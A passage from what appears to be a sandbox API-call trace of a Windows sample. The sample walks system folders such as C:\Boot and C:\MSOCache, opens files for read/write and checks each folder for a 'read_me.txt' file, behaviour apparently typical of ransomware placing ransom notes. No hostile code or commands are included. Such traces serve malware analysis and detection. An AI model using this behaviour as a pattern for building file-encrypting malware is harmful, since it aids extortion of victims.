dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.874] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x168f7e70, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x168f7e70, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x168f7e70, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.874] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\read_me.txt") returned 29 [0073.874] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\read_me.txt" (normalized: "c:\\boot\\tr-tr\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.874] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.874] CloseHandle (hObject=0x7ac) returned 1 [0073.874] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x168f7e70, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x168f7e70, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x168f7e70, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.874] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.874] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\read_me.txt") returned 29 [0073.874] GetProcessHeap () returned 0x280000 [0073.875] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a70098 | out: hHeap=0x280000) returned 1 [0073.875] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 22 [0073.875] GetProcessHeap () returned 0x280000 [0073.875] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b50108 | out: hHeap=0x280000) returned 1 [0073.875] GetProcessHeap () returned 0x280000 [0073.875] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a70098 [0073.875] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\*") returned 19 [0073.875] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x168f7e70, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x168f7e70, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.875] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\.") returned 19 [0073.875] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x168f7e70, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x168f7e70, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.875] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\..") returned 20 [0073.875] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.875] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 33 [0073.875] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.875] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x168f7e70, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x168f7e70, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x168f7e70, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.875] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\read_me.txt") returned 29 [0073.875] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\read_me.txt" (normalized: "c:\\boot\\zh-cn\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.875] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.875] CloseHandle (hObject=0x7ac) returned 1 [0073.875] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x168f7e70, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x168f7e70, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x168f7e70, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.875] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.875] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\read_me.txt") returned 29 [0073.876] GetProcessHeap () returned 0x280000 [0073.876] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a70098 | out: hHeap=0x280000) returned 1 [0073.876] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 23 [0073.876] GetProcessHeap () returned 0x280000 [0073.876] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x89e0050 | out: hHeap=0x280000) returned 1 [0073.876] GetProcessHeap () returned 0x280000 [0073.876] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x89e0050 [0073.876] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\*") returned 19 [0073.876] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1696a290, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1696a290, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.876] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\.") returned 19 [0073.876] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1696a290, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1696a290, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.876] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\..") returned 20 [0073.876] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.876] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 33 [0073.876] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.876] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1696a290, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x1696a290, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1696a290, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.876] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\read_me.txt") returned 29 [0073.876] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\read_me.txt" (normalized: "c:\\boot\\zh-hk\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.876] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.876] CloseHandle (hObject=0x7ac) returned 1 [0073.876] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1696a290, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x1696a290, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1696a290, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.876] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.877] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\read_me.txt") returned 29 [0073.877] GetProcessHeap () returned 0x280000 [0073.877] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x89e0050 | out: hHeap=0x280000) returned 1 [0073.877] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 24 [0073.877] GetProcessHeap () returned 0x280000 [0073.877] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b60110 | out: hHeap=0x280000) returned 1 [0073.877] GetProcessHeap () returned 0x280000 [0073.877] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x89e0050 [0073.877] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\*") returned 19 [0073.877] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1696a290, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1696a290, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.877] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\.") returned 19 [0073.877] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1696a290, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1696a290, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.877] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\..") returned 20 [0073.877] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.877] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 33 [0073.877] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.877] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1696a290, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x1696a290, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1696a290, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.877] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\read_me.txt") returned 29 [0073.877] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\read_me.txt" (normalized: "c:\\boot\\zh-tw\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.877] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.877] CloseHandle (hObject=0x7ac) returned 1 [0073.877] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1696a290, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x1696a290, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1696a290, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.878] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.878] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\read_me.txt") returned 29 [0073.878] GetProcessHeap () returned 0x280000 [0073.878] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x89e0050 | out: hHeap=0x280000) returned 1 [0073.878] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 25 [0073.878] GetProcessHeap () returned 0x280000 [0073.878] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a00060 | out: hHeap=0x280000) returned 1 [0073.881] GetProcessHeap () returned 0x280000 [0073.881] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a00060 [0073.925] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Config.Msi\\*") returned 19 [0073.926] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x1696a290, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1696a290, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b26b8 [0073.926] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\.") returned 19 [0073.926] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x1696a290, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1696a290, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.926] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\..") returned 20 [0073.926] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1696a290, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x1696a290, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1696a290, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.926] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\read_me.txt") returned 29 [0073.926] CreateFileW (lpFileName="\\\\?\\C:\\Config.Msi\\read_me.txt" (normalized: "c:\\config.msi\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0073.926] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.926] CloseHandle (hObject=0x7a4) returned 1 [0073.926] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1696a290, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x1696a290, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1696a290, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.926] FindClose (in: hFindFile=0x2b26b8 | out: hFindFile=0x2b26b8) returned 1 [0073.926] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Config.Msi\\read_me.txt") returned 29 [0073.926] GetProcessHeap () returned 0x280000 [0073.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a00060 | out: hHeap=0x280000) returned 1 [0073.926] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 26 [0073.926] GetProcessHeap () returned 0x280000 [0073.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a10068 | out: hHeap=0x280000) returned 1 [0073.926] GetProcessHeap () returned 0x280000 [0073.927] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ab00b8 [0073.927] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Documents and Settings\\*") returned 31 [0073.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1696a290, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x1696a290, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1696a290, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0xffffffff [0073.927] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Documents and Settings\\read_me.txt") returned 41 [0073.927] GetProcessHeap () returned 0x280000 [0073.927] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ab00b8 | out: hHeap=0x280000) returned 1 [0073.927] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 27 [0073.927] GetProcessHeap () returned 0x280000 [0073.927] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a20070 | out: hHeap=0x280000) returned 1 [0073.927] GetProcessHeap () returned 0x280000 [0073.927] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ab00b8 [0073.927] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\*") returned 17 [0073.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b26b8 [0073.927] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\.") returned 17 [0073.927] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.927] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\..") returned 18 [0073.927] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0073.927] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users") returned 25 [0073.927] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x169903f0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, 